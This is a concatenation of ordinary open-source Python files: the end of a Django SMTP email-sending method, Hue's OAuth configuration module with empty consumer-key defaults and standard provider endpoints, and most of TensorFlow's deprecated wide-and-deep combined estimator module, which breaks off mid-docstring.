self.connection: # We failed silently on open(). # Trying to send would be pointless. return num_sent = 0 for message in email_messages: sent = self._send(message) if sent: num_sent += 1 if new_conn_created: self.close() return num_sent def _send(self, email_message): """A helper method that does the actual sending.""" if not email_message.recipients(): return False from_email = sanitize_address(email_message.from_email, email_message.encoding) recipients = [sanitize_address(addr, email_message.encoding) for addr in email_message.recipients()] message = email_message.message() try: self.connection.sendmail(from_email, recipients, message.as_bytes(linesep='\r\n')) except smtplib.SMTPException: if not self.fail_silently: raise return False return True
lumig242/Hue-Integration-with-CDAP
refs/heads/pull3
desktop/libs/liboauth/src/liboauth/conf.py
35
#!/usr/bin/env python # Licensed to Cloudera, Inc. under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. Cloudera, Inc. licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from django.utils.translation import ugettext_lazy as _t, ugettext as _ from desktop.lib.conf import Config, coerce_bool, coerce_csv, coerce_json_dict CONSUMER_KEY_TWITTER = Config( key="consumer_key_twitter", help=_t("The Consumer key of the twitter application."), type=str, default="" ) CONSUMER_KEY_GOOGLE = Config( key="consumer_key_google", help=_t("The Consumer key of the google application."), type=str, default="" ) CONSUMER_KEY_FACEBOOK = Config( key="consumer_key_facebook", help=_t("The Consumer key of the facebook application."), type=str, default="" ) CONSUMER_KEY_LINKEDIN = Config( key="consumer_key_linkedin", help=_t("The Consumer key of the linkedin application."), type=str, default="" ) CONSUMER_SECRET_TWITTER = Config( key="consumer_secret_twitter", help=_t("The Consumer secret of the twitter application."), type=str, default="" ) CONSUMER_SECRET_GOOGLE = Config( key="consumer_secret_google", help=_t("The Consumer secret of the google application."), type=str, default="" ) CONSUMER_SECRET_FACEBOOK = Config( key="consumer_secret_facebook", help=_t("The Consumer secret of the facebook application."), type=str, default="" ) CONSUMER_SECRET_LINKEDIN = Config( key="consumer_secret_linkedin", help=_t("The Consumer secret of the linkedin application."), type=str, default="" ) REQUEST_TOKEN_URL_TWITTER = Config( key="request_token_url_twitter", help=_t("The Twitter Request token URL."), type=str, default="https://api.twitter.com/oauth/request_token" ) REQUEST_TOKEN_URL_GOOGLE = Config( key="request_token_url_google", help=_t("The Google Request token URL."), type=str, default="https://accounts.google.com/o/oauth2/auth" ) REQUEST_TOKEN_URL_FACEBOOK = Config( key="request_token_url_facebook", help=_t("The Facebook Request token URL."), type=str, default="https://graph.facebook.com/oauth/authorize" ) REQUEST_TOKEN_URL_LINKEDIN = Config( key="request_token_url_linkedin", help=_t("The Linkedin Request token URL."), type=str, default="https://www.linkedin.com/uas/oauth2/authorization" ) ACCESS_TOKEN_URL_TWITTER = Config( key="access_token_url_twitter", help=_t("The Twitter Access token URL."), type=str, default="https://api.twitter.com/oauth/access_token" ) ACCESS_TOKEN_URL_GOOGLE = Config( key="access_token_url_google", help=_t("The Google Access token URL."), type=str, default="https://accounts.google.com/o/oauth2/token" ) ACCESS_TOKEN_URL_FACEBOOK = Config( key="access_token_url_facebook", help=_t("The Facebook Access token URL."), type=str, default="https://graph.facebook.com/oauth/access_token" ) ACCESS_TOKEN_URL_LINKEDIN = Config( key="access_token_url_linkedin", help=_t("The Linkedin Access token URL."), type=str, default="https://api.linkedin.com/uas/oauth2/accessToken" ) AUTHORIZE_URL_TWITTER = Config( key="authenticate_url_twitter", help=_t("The Twitter Authorize URL."), type=str, default="https://api.twitter.com/oauth/authorize" ) AUTHORIZE_URL_GOOGLE = Config( key="authenticate_url_google", help=_t("The Google Authorize URL."), type=str, default="https://www.googleapis.com/oauth2/v1/userinfo" ) AUTHORIZE_URL_FACEBOOK = Config( key="authenticate_url_facebook", help=_t("The Facebook Authorize URL."), type=str, default="https://graph.facebook.com/me" ) AUTHORIZE_URL_LINKEDIN = Config( key="authenticate_url_linkedin", help=_t("The Linkedin Authorize URL."), type=str, default="https://api.linkedin.com/v1/people/~" ) WHITELISTED_DOMAINS_GOOGLE = Config( key="whitelisted_domains_google", help=_t("Comma-separated list of whitelisted domains."), type=coerce_csv, default='' ) USERNAME_MAP = Config( key="username_map", help=_t('JSON formatted hash of username simplifications. ' 'Example: {"@sub1.domain.com":"_S1", "@sub2.domain.com":"_S2"} ' 'converts "email@sub1.domain.com" to "email_S1"'), type=coerce_json_dict, default='{}' )
yanchen036/tensorflow
refs/heads/master
tensorflow/contrib/learn/python/learn/estimators/dnn_linear_combined.py
26
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """TensorFlow estimators for Linear and DNN joined training models (deprecated). This module and all its submodules are deprecated. See [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md) for migration instructions. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import math import six from tensorflow.contrib import layers from tensorflow.contrib.framework import deprecated from tensorflow.contrib.framework import deprecated_arg_values from tensorflow.contrib.layers.python.layers import feature_column as feature_column_lib from tensorflow.contrib.layers.python.layers import optimizers from tensorflow.contrib.learn.python.learn import metric_spec from tensorflow.contrib.learn.python.learn.estimators import estimator from tensorflow.contrib.learn.python.learn.estimators import head as head_lib from tensorflow.contrib.learn.python.learn.estimators import model_fn from tensorflow.contrib.learn.python.learn.estimators import prediction_key from tensorflow.contrib.learn.python.learn.utils import export from tensorflow.python.feature_column import feature_column as fc_core from tensorflow.python.framework import ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import nn from tensorflow.python.ops import partitioned_variables from tensorflow.python.ops import state_ops from tensorflow.python.ops import variable_scope from tensorflow.python.summary import summary from tensorflow.python.training import sync_replicas_optimizer from tensorflow.python.training import training_util # The default learning rates are a historical artifact of the initial # implementation, but seem a reasonable choice. _DNN_LEARNING_RATE = 0.05 _LINEAR_LEARNING_RATE = 0.2 _FIX_GLOBAL_STEP_INCREMENT_DATE = "2017-04-15" _FIX_GLOBAL_STEP_INCREMENT_INSTRUCTIONS = ( "Please set fix_global_step_increment_bug=True and update training steps " "in your pipeline. See pydoc for details.") def _as_iterable(preds, output): for pred in preds: yield pred[output] def _get_feature_dict(features): if isinstance(features, dict): return features return {"": features} def _get_optimizer(optimizer): if callable(optimizer): return optimizer() else: return optimizer def _check_no_sync_replicas_optimizer(optimizer): if isinstance(optimizer, sync_replicas_optimizer.SyncReplicasOptimizer): raise ValueError( "SyncReplicasOptimizer is not supported in DNNLinearCombined model. " "If you want to use this optimizer, please use either DNN or Linear " "model.") def _linear_learning_rate(num_linear_feature_columns): """Returns the default learning rate of the linear model. The calculation is a historical artifact of this initial implementation, but has proven a reasonable choice. Args: num_linear_feature_columns: The number of feature columns of the linear model. Returns: A float. """ default_learning_rate = 1. / math.sqrt(num_linear_feature_columns) return min(_LINEAR_LEARNING_RATE, default_learning_rate) def _add_hidden_layer_summary(value, tag): summary.scalar("%s/fraction_of_zero_values" % tag, nn.zero_fraction(value)) summary.histogram("%s/activation" % tag, value) def _add_layer_summary(value, tag): summary.scalar("%s/fraction_of_zero_values" % tag, nn.zero_fraction(value)) summary.histogram("%s/activation" % tag, value) def _get_embedding_variable(column, collection_key, input_layer_scope): return ops.get_collection(collection_key, input_layer_scope + "/" + column.name) def _extract_embedding_lr_multipliers(embedding_lr_multipliers, collection_key, input_layer_scope): """Converts embedding lr multipliers to variable based gradient multiplier.""" if not embedding_lr_multipliers: return None gradient_multipliers = {} for column, lr_mult in embedding_lr_multipliers.items(): if not isinstance(column, feature_column_lib._EmbeddingColumn): # pylint: disable=protected-access raise ValueError( "learning rate multipler can only be defined for embedding columns. " "It is defined for {}".format(column)) embedding = _get_embedding_variable( column, collection_key, input_layer_scope) if not embedding: raise ValueError("Couldn't find a variable for column {}".format(column)) for v in embedding: gradient_multipliers[v] = lr_mult return gradient_multipliers def _dnn_linear_combined_model_fn(features, labels, mode, params, config=None): """Deep Neural Net and Linear combined model_fn. Args: features: `Tensor` or dict of `Tensor` (depends on data passed to `fit`). labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of dtype `int32` or `int64` in the range `[0, n_classes)`. mode: Defines whether this is training, evaluation or prediction. See `ModeKeys`. params: A dict of hyperparameters. The following hyperparameters are expected: * head: A `Head` instance. * linear_feature_columns: An iterable containing all the feature columns used by the Linear model. * linear_optimizer: string, `Optimizer` object, or callable that defines the optimizer to use for training the Linear model. Defaults to the Ftrl optimizer. * joint_linear_weights: If True a single (possibly partitioned) variable will be used to store the linear model weights. It's faster, but requires all columns are sparse and have the 'sum' combiner. * dnn_feature_columns: An iterable containing all the feature columns used by the DNN model. * dnn_optimizer: string, `Optimizer` object, or callable that defines the optimizer to use for training the DNN model. Defaults to the Adagrad optimizer. * dnn_hidden_units: List of hidden units per DNN layer. * dnn_activation_fn: Activation function applied to each DNN layer. If `None`, will use `tf.nn.relu`. * dnn_dropout: When not `None`, the probability we will drop out a given DNN coordinate. * gradient_clip_norm: A float > 0. If provided, gradients are clipped to their global norm with this clipping ratio. * embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to multiply with learning rate for the embedding variables. * input_layer_partitioner: Optional. Partitioner for input layer. config: `RunConfig` object to configure the runtime settings. Returns: `ModelFnOps` Raises: ValueError: If both `linear_feature_columns` and `dnn_features_columns` are empty at the same time, or `input_layer_partitioner` is missing. """ head = params["head"] linear_feature_columns = params.get("linear_feature_columns") linear_optimizer = params.get("linear_optimizer") or "Ftrl" joint_linear_weights = params.get("joint_linear_weights") dnn_feature_columns = params.get("dnn_feature_columns") dnn_optimizer = params.get("dnn_optimizer") or "Adagrad" dnn_hidden_units = params.get("dnn_hidden_units") dnn_activation_fn = params.get("dnn_activation_fn") or nn.relu dnn_dropout = params.get("dnn_dropout") gradient_clip_norm = params.get("gradient_clip_norm") num_ps_replicas = config.num_ps_replicas if config else 0 input_layer_partitioner = params.get("input_layer_partitioner") or ( partitioned_variables.min_max_variable_partitioner( max_partitions=num_ps_replicas, min_slice_size=64 << 20)) embedding_lr_multipliers = params.get("embedding_lr_multipliers", {}) fix_global_step_increment_bug = params.get( "fix_global_step_increment_bug", True) if not linear_feature_columns and not dnn_feature_columns: raise ValueError( "Either linear_feature_columns or dnn_feature_columns must be defined.") features = _get_feature_dict(features) linear_optimizer = _get_optimizer(linear_optimizer) _check_no_sync_replicas_optimizer(linear_optimizer) dnn_optimizer = _get_optimizer(dnn_optimizer) _check_no_sync_replicas_optimizer(dnn_optimizer) # Build DNN Logits. dnn_parent_scope = "dnn" if not dnn_feature_columns: dnn_logits = None else: if not dnn_hidden_units: raise ValueError( "dnn_hidden_units must be defined when dnn_feature_columns is " "specified.") dnn_partitioner = ( partitioned_variables.min_max_variable_partitioner( max_partitions=num_ps_replicas)) with variable_scope.variable_scope( dnn_parent_scope, values=tuple(six.itervalues(features)), partitioner=dnn_partitioner): with variable_scope.variable_scope( "input_from_feature_columns", values=tuple(six.itervalues(features)), partitioner=input_layer_partitioner) as dnn_input_scope: if all([ isinstance(fc, feature_column_lib._FeatureColumn) # pylint: disable=protected-access for fc in dnn_feature_columns ]): net = layers.input_from_feature_columns( columns_to_tensors=features, feature_columns=dnn_feature_columns, weight_collections=[dnn_parent_scope], scope=dnn_input_scope) else: net = fc_core.input_layer( features=features, feature_columns=dnn_feature_columns, weight_collections=[dnn_parent_scope]) for layer_id, num_hidden_units in enumerate(dnn_hidden_units): with variable_scope.variable_scope( "hiddenlayer_%d" % layer_id, values=(net,)) as dnn_hidden_layer_scope: net = layers.fully_connected( net, num_hidden_units, activation_fn=dnn_activation_fn, variables_collections=[dnn_parent_scope], scope=dnn_hidden_layer_scope) if dnn_dropout is not None and mode == model_fn.ModeKeys.TRAIN: net = layers.dropout( net, keep_prob=(1.0 - dnn_dropout)) # TODO(b/31209633): Consider adding summary before dropout. _add_layer_summary(net, dnn_hidden_layer_scope.name) with variable_scope.variable_scope( "logits", values=(net,)) as dnn_logits_scope: dnn_logits = layers.fully_connected( net, head.logits_dimension, activation_fn=None, variables_collections=[dnn_parent_scope], scope=dnn_logits_scope) _add_layer_summary(dnn_logits, dnn_logits_scope.name) # Build Linear logits. linear_parent_scope = "linear" if not linear_feature_columns: linear_logits = None else: linear_partitioner = partitioned_variables.min_max_variable_partitioner( max_partitions=num_ps_replicas, min_slice_size=64 << 20) with variable_scope.variable_scope( linear_parent_scope, values=tuple(six.itervalues(features)), partitioner=linear_partitioner) as scope: if all([isinstance(fc, feature_column_lib._FeatureColumn) # pylint: disable=protected-access for fc in linear_feature_columns]): if joint_linear_weights: linear_logits, _, _ = layers.joint_weighted_sum_from_feature_columns( columns_to_tensors=features, feature_columns=linear_feature_columns, num_outputs=head.logits_dimension, weight_collections=[linear_parent_scope], scope=scope) else: linear_logits, _, _ = layers.weighted_sum_from_feature_columns( columns_to_tensors=features, feature_columns=linear_feature_columns, num_outputs=head.logits_dimension, weight_collections=[linear_parent_scope], scope=scope) else: linear_logits = fc_core.linear_model( features=features, feature_columns=linear_feature_columns, units=head.logits_dimension, weight_collections=[linear_parent_scope]) _add_layer_summary(linear_logits, scope.name) # Combine logits and build full model. if dnn_logits is not None and linear_logits is not None: logits = dnn_logits + linear_logits elif dnn_logits is not None: logits = dnn_logits else: logits = linear_logits def _make_training_op(training_loss): """Training op for the DNN linear combined model.""" train_ops = [] global_step = training_util.get_global_step() if dnn_logits is not None: train_ops.append( optimizers.optimize_loss( loss=training_loss, global_step=global_step, learning_rate=_DNN_LEARNING_RATE, optimizer=dnn_optimizer, gradient_multipliers=_extract_embedding_lr_multipliers( # pylint: disable=protected-access embedding_lr_multipliers, dnn_parent_scope, dnn_input_scope.name), clip_gradients=gradient_clip_norm, variables=ops.get_collection(dnn_parent_scope), name=dnn_parent_scope, # Empty summaries, because head already logs "loss" summary. summaries=[], increment_global_step=not fix_global_step_increment_bug)) if linear_logits is not None: train_ops.append( optimizers.optimize_loss( loss=training_loss, global_step=global_step, learning_rate=_linear_learning_rate(len(linear_feature_columns)), optimizer=linear_optimizer, clip_gradients=gradient_clip_norm, variables=ops.get_collection(linear_parent_scope), name=linear_parent_scope, # Empty summaries, because head already logs "loss" summary. summaries=[], increment_global_step=not fix_global_step_increment_bug)) train_op = control_flow_ops.group(*train_ops) if fix_global_step_increment_bug: with ops.control_dependencies([train_op]): with ops.colocate_with(global_step): return state_ops.assign_add(global_step, 1).op return train_op return head.create_model_fn_ops( features=features, mode=mode, labels=labels, train_op_fn=_make_training_op, logits=logits) class DNNLinearCombinedEstimator(estimator.Estimator): """An estimator for TensorFlow Linear and DNN joined training models. THIS CLASS IS DEPRECATED. See [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md) for general migration instructions. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Input of `fit`, `train`, and `evaluate` should have following features, otherwise there will be a `KeyError`: if `weight_column_name` is not `None`, a feature with `key=weight_column_name` whose value is a `Tensor`. for each `column` in `dnn_feature_columns` + `linear_feature_columns`: - if `column` is a `SparseColumn`, a feature with `key=column.name` whose `value` is a `SparseTensor`. - if `column` is a `WeightedSparseColumn`, two features: the first with `key` the id column name, the second with `key` the weight column name. Both features' `value` must be a `SparseTensor`. - if `column` is a `RealValuedColumn, a feature with `key=column.name` whose `value` is a `Tensor`. """ @deprecated_arg_values( _FIX_GLOBAL_STEP_INCREMENT_DATE, _FIX_GLOBAL_STEP_INCREMENT_INSTRUCTIONS, fix_global_step_increment_bug=False) def __init__(self, # _joint_linear_weights pylint: disable=invalid-name head, model_dir=None, linear_feature_columns=None, linear_optimizer=None, _joint_linear_weights=False, dnn_feature_columns=None, dnn_optimizer=None, dnn_hidden_units=None, dnn_activation_fn=None, dnn_dropout=None, gradient_clip_norm=None, config=None, feature_engineering_fn=None, embedding_lr_multipliers=None, fix_global_step_increment_bug=False, input_layer_partitioner=None): """Initializes a DNNLinearCombinedEstimator instance. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Args: head: A _Head object. model_dir: Directory to save model parameters, graph and etc. This can also be used to load checkpoints from the directory into a estimator to continue training a previously saved model. linear_feature_columns: An iterable containing all the feature columns used by linear part of the model. All items in the set should be instances of classes derived from `FeatureColumn`. linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to the linear part of the model. If `None`, will use a FTRL optimizer. _joint_linear_weights: If True will use a single (possibly partitioned) variable to store all weights for the linear model. More efficient if there are many columns, however requires all columns are sparse and have the 'sum' combiner. dnn_feature_columns: An iterable containing all the feature columns used by deep part of the model. All items in the set should be instances of classes derived from `FeatureColumn`. dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to the deep part of the model. If `None`, will use an Adagrad optimizer. dnn_hidden_units: List of hidden units per layer. All layers are fully connected. dnn_activation_fn: Activation function applied to each layer. If `None`, will use `tf.nn.relu`. dnn_dropout: When not None, the probability we will drop out a given coordinate. gradient_clip_norm: A float > 0. If provided, gradients are clipped to their global norm with this clipping ratio. See tf.clip_by_global_norm for more details. config: RunConfig object to configure the runtime settings. feature_engineering_fn: Feature engineering function. Takes features and labels which are the output of `input_fn` and returns features and labels which will be fed into the model. embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to multiply with learning rate for the embedding variables. fix_global_step_increment_bug: If `False`, the estimator needs two fit steps to optimize both linear and dnn parts. If `True`, this bug is fixed. New users must set this to `True`, but the default value is `False` for backwards compatibility. input_layer_partitioner: Optional. Partitioner for input layer. Raises: ValueError: If both linear_feature_columns and dnn_features_columns are empty at the same time. """ linear_feature_columns = tuple(linear_feature_columns or []) dnn_feature_columns = tuple(dnn_feature_columns or []) if not linear_feature_columns + dnn_feature_columns: raise ValueError("Either linear_feature_columns or dnn_feature_columns " "must be defined.") super(DNNLinearCombinedEstimator, self).__init__( model_fn=_dnn_linear_combined_model_fn, model_dir=model_dir, config=config, params={ "head": head, "linear_feature_columns": linear_feature_columns, "linear_optimizer": linear_optimizer, "joint_linear_weights": _joint_linear_weights, "dnn_feature_columns": dnn_feature_columns, "dnn_optimizer": dnn_optimizer, "dnn_hidden_units": dnn_hidden_units, "dnn_activation_fn": dnn_activation_fn, "dnn_dropout": dnn_dropout, "gradient_clip_norm": gradient_clip_norm, "embedding_lr_multipliers": embedding_lr_multipliers, "fix_global_step_increment_bug": fix_global_step_increment_bug, "input_layer_partitioner": input_layer_partitioner }, feature_engineering_fn=feature_engineering_fn) class DNNLinearCombinedClassifier(estimator.Estimator): """A classifier for TensorFlow Linear and DNN joined training models. THIS CLASS IS DEPRECATED. See [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md) for general migration instructions. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Example: ```python sparse_feature_a = sparse_column_with_hash_bucket(...) sparse_feature_b = sparse_column_with_hash_bucket(...) sparse_feature_a_x_sparse_feature_b = crossed_column(...) sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a, ...) sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b, ...) estimator = DNNLinearCombinedClassifier( # common settings n_classes=n_classes, weight_column_name=weight_column_name, # wide settings linear_feature_columns=[sparse_feature_a_x_sparse_feature_b], linear_optimizer=tf.train.FtrlOptimizer(...), # deep settings dnn_feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb], dnn_hidden_units=[1000, 500, 100], dnn_optimizer=tf.train.AdagradOptimizer(...)) # Input builders def input_fn_train: # returns x, y (where y represents label's class index). ... def input_fn_eval: # returns x, y (where y represents label's class index). ... def input_fn_predict: # returns x, None. ... estimator.fit(input_fn=input_fn_train) estimator.evaluate(input_fn=input_fn_eval) # predict_classes returns class indices. estimator.predict_classes(input_fn=input_fn_predict) ``` If the user specifies `label_keys` in constructor, labels must be strings from the `label_keys` vocabulary. Example: ```python label_keys = ['label0', 'label1', 'label2'] estimator = DNNLinearCombinedClassifier( n_classes=n_classes, linear_feature_columns=[sparse_feature_a_x_sparse_feature_b], dnn_feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb], dnn_hidden_units=[1000, 500, 100], label_keys=label_keys) def input_fn_train: # returns x, y (where y is one of label_keys). pass estimator.fit(input_fn=input_fn_train) def input_fn_eval: # returns x, y (where y is one of label_keys). pass estimator.evaluate(input_fn=input_fn_eval) def input_fn_predict: # returns x, None # predict_classes returns one of label_keys. estimator.predict_classes(input_fn=input_fn_predict) ``` Input of `fit` and `evaluate` should have following features, otherwise there will be a `KeyError`: * if `weight_column_name` is not `None`, a feature with `key=weight_column_name` whose value is a `Tensor`. * for each `column` in `dnn_feature_columns` + `linear_feature_columns`: - if `column` is a `SparseColumn`, a feature with `key=column.name` whose `value` is a `SparseTensor`. - if `column` is a `WeightedSparseColumn`, two features: the first with `key` the id column name, the second with `key` the weight column name. Both features' `value` must be a `SparseTensor`. - if `column` is a `RealValuedColumn, a feature with `key=column.name` whose `value` is a `Tensor`. """ @deprecated_arg_values( _FIX_GLOBAL_STEP_INCREMENT_DATE, _FIX_GLOBAL_STEP_INCREMENT_INSTRUCTIONS, fix_global_step_increment_bug=False) def __init__(self, # _joint_linear_weights pylint: disable=invalid-name model_dir=None, n_classes=2, weight_column_name=None, linear_feature_columns=None, linear_optimizer=None, _joint_linear_weights=False, dnn_feature_columns=None, dnn_optimizer=None, dnn_hidden_units=None, dnn_activation_fn=nn.relu, dnn_dropout=None, gradient_clip_norm=None, enable_centered_bias=False, config=None, feature_engineering_fn=None, embedding_lr_multipliers=None, input_layer_min_slice_size=None, label_keys=None, fix_global_step_increment_bug=False): """Constructs a DNNLinearCombinedClassifier instance. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Args: model_dir: Directory to save model parameters, graph and etc. This can also be used to load checkpoints from the directory into a estimator to continue training a previously saved model. n_classes: number of label classes. Default is binary classification. Note that class labels are integers representing the class index (i.e. values from 0 to n_classes-1). For arbitrary label values (e.g. string labels), convert to class indices first. weight_column_name: A string defining feature column name representing weights. It is used to down weight or boost examples during training. It will be multiplied by the loss of the example. linear_feature_columns: An iterable containing all the feature columns used by linear part of the model. All items in the set must be instances of classes derived from `FeatureColumn`. linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to the linear part of the model. If `None`, will use a FTRL optimizer. _joint_linear_weights: If True a single (possibly partitioned) variable will be used to store the linear model weights. It's faster, but requires all columns are sparse and have the 'sum' combiner. dnn_feature_columns: An iterable containing all the feature columns used by deep part of the model. All items in the set must be instances of classes derived from `FeatureColumn`. dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to the deep part of the model. If `None`, will use an Adagrad optimizer. dnn_hidden_units: List of hidden units per layer. All layers are fully connected. dnn_activation_fn: Activation function applied to each layer. If `None`, will use `tf.nn.relu`. dnn_dropout: When not None, the probability we will drop out a given coordinate. gradient_clip_norm: A float > 0. If provided, gradients are clipped to their global norm with this clipping ratio. See tf.clip_by_global_norm for more details. enable_centered_bias: A bool. If True, estimator will learn a centered bias variable for each class. Rest of the model structure learns the residual after centered bias. config: RunConfig object to configure the runtime settings. feature_engineering_fn: Feature engineering function. Takes features and labels which are the output of `input_fn` and returns features and labels which will be fed into the model. embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to multiply with learning rate for the embedding variables. input_layer_min_slice_size: Optional. The min slice size of input layer partitions. If not provided, will use the default of 64M. label_keys: Optional list of strings with size `[n_classes]` defining the label vocabulary. Only supported for `n_classes` > 2. fix_global_step_increment_bug: If `False`, the estimator needs two fit steps to optimize both linear and dnn parts. If `True`, this bug is fixed. New users must set this to `True`, but it the default value is `False` for backwards compatibility. Raises: ValueError: If `n_classes` < 2. ValueError: If both `linear_feature_columns` and `dnn_features_columns` are empty at the same time. """ head = head_lib.multi_class_head( n_classes=n_classes, weight_column_name=weight_column_name, enable_centered_bias=enable_centered_bias, label_keys=label_keys) linear_feature_columns = tuple(linear_feature_columns or []) dnn_feature_columns = tuple(dnn_feature_columns or []) self._feature_columns = linear_feature_columns + dnn_feature_columns if not self._feature_columns: raise ValueError("Either linear_feature_columns or dnn_feature_columns " "must be defined.") # TODO(b/35922130): Replace with `input_layer_partitioner` arg. input_layer_partitioner = None if input_layer_min_slice_size is not None: input_layer_partitioner = ( partitioned_variables.min_max_variable_partitioner( max_partitions=config.num_ps_replicas if config else 0, min_slice_size=input_layer_min_slice_size)) super(DNNLinearCombinedClassifier, self).__init__( model_fn=_dnn_linear_combined_model_fn, model_dir=model_dir, config=config, params={ "head": head, "linear_feature_columns": linear_feature_columns, "linear_optimizer": linear_optimizer, "joint_linear_weights": _joint_linear_weights, "dnn_feature_columns": dnn_feature_columns, "dnn_optimizer": dnn_optimizer, "dnn_hidden_units": dnn_hidden_units, "dnn_activation_fn": dnn_activation_fn, "dnn_dropout": dnn_dropout, "gradient_clip_norm": gradient_clip_norm, "embedding_lr_multipliers": embedding_lr_multipliers, "input_layer_partitioner": input_layer_partitioner, "fix_global_step_increment_bug": fix_global_step_increment_bug, }, feature_engineering_fn=feature_engineering_fn) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) @deprecated_arg_values( "2017-03-01", "Please switch to predict_classes, or set `outputs` argument.", outputs=None) def predict(self, x=None, input_fn=None, batch_size=None, outputs=None, as_iterable=True): """Returns predictions for given features. By default, returns predicted classes. But this default will be dropped soon. Users should either pass `outputs`, or call `predict_classes` method. Args: x: features. input_fn: Input function. If set, x must be None. batch_size: Override default batch size. outputs: list of `str`, name of the output to predict. If `None`, returns classes. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted classes with shape [batch_size] (or an iterable of predicted classes if as_iterable is True). Each predicted class is represented by its class index (i.e. integer from 0 to n_classes-1). If `outputs` is set, returns a dict of predictions. """ if not outputs: return self.predict_classes( x=x, input_fn=input_fn, batch_size=batch_size, as_iterable=as_iterable) return super(DNNLinearCombinedClassifier, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=outputs, as_iterable=as_iterable) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) def predict_classes(self, x=None, input_fn=None, batch_size=None, as_iterable=True): """Returns predicted classes for given features. Args: x: features. input_fn: Input function. If set, x must be None. batch_size: Override default batch size. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted classes with shape [batch_size] (or an iterable of predicted classes if as_iterable is True). Each predicted class is represented by its class index (i.e. integer from 0 to n_classes-1). """ key = prediction_key.PredictionKey.CLASSES preds = super(DNNLinearCombinedClassifier, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=[key], as_iterable=as_iterable) if as_iterable: return _as_iterable(preds, output=key) return preds[key].reshape(-1) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) def predict_proba( self, x=None, input_fn=None, batch_size=None, as_iterable=True): """Returns prediction probabilities for given features. Args: x: features. input_fn: Input function. If set, x and y must be None. batch_size: Override default batch size. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted probabilities with shape [batch_size, n_classes] (or an iterable of predicted probabilities if as_iterable is True). """ key = prediction_key.PredictionKey.PROBABILITIES preds = super(DNNLinearCombinedClassifier, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=[key], as_iterable=as_iterable) if as_iterable: return _as_iterable(preds, output=key) return preds[key] @deprecated("2017-03-25", "Please use Estimator.export_savedmodel() instead.") def export(self, export_dir, input_fn=None, input_feature_key=None, use_deprecated_input_fn=True, signature_fn=None, default_batch_size=1, exports_to_keep=None): """See BasEstimator.export.""" def default_input_fn(unused_estimator, examples): return layers.parse_feature_columns_from_examples( examples, self._feature_columns) return super(DNNLinearCombinedClassifier, self).export( export_dir=export_dir, input_fn=input_fn or default_input_fn, input_feature_key=input_feature_key, use_deprecated_input_fn=use_deprecated_input_fn, signature_fn=(signature_fn or export.classification_signature_fn_with_prob), prediction_key=prediction_key.PredictionKey.PROBABILITIES, default_batch_size=default_batch_size, exports_to_keep=exports_to_keep) class DNNLinearCombinedRegressor(estimator.Estimator): """A regressor for TensorFlow Linear and DNN joined training models. THIS CLASS IS DEPRECATED. See [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md) for general migration instructions. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Example: ```python sparse_feature_a = sparse_column_with_hash_bucket(...) sparse_feature_b = sparse_column_with_hash_bucket(...) sparse_feature_a_x_sparse_feature_b = crossed_column(...) sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a, ...) sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b, ...) estimator = DNNLinearCombinedRegressor( 